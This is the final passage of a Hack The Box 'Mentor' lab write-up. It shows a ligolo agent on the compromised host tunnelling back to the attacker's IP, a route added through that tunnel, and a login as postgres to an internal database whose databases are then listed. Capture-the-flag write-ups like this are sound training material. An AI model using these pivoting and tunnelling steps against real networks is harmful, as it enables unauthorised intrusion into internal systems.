-rwxr-xr-x 1 root root 4681728 May 26 09:02 agent
-rwxr-xr-x 1 root root 8654848 May 26 08:35 chisel_1.9.1_linux_amd64
/tmp # ./agent -connect 10.10.14.45:11601 -ignore-cert
WARN[0000] warning, certificate validation disabled
INFO[0000] Connection established addr="10.10.14.45:11601"



┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo ip route add 172.22.0.1/32 dev ligolo

┌──(kali㉿offsec)-[~/Desktop]
└─$ psql -h 172.22.0.1 -p 5432 -U postgres
用户 postgres 的口令:
psql (16.1 (Debian 16.1-1), 服务器 13.7 (Debian 13.7-1.pgdg110+1))
输入 "help" 来获取帮助信息.

postgres=# \l
数据库列表
名称 | 拥有者 | 字元编码 | Locale Provider | 校对规则 | Ctype | ICU Locale | ICU Rules | 存取权限
-----------------+----------+----------+-----------------+------------+------------+------------+-----------+-----------------------
mentorquotes_db | postgres | UTF8 | libc | en_US.utf8 | en_US.utf8 | | |
postgres | postgres | UTF8 | libc | en_US.utf8 | en_US.utf8 | | |
template0 | postgres | UTF8 | libc | en_US.utf8 | en_US.utf8 | | | =c/postgres +
| | | | | | | | postgres=CTc/postgres
template1 | postgres | UTF8 | libc | en_US.utf8 | en_US.utf8 | | | =c/postgres +
| | | | | | | | postgres=CTc/postgres
(4 行记录)

postgres=#



Finally, delete that route and you are done.

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/518


Mentor-htb-writeup
https://sh1yan.top/2024/05/26/Mentor-htb-writeup/
Author
shiyan
Published
26 May 2024
License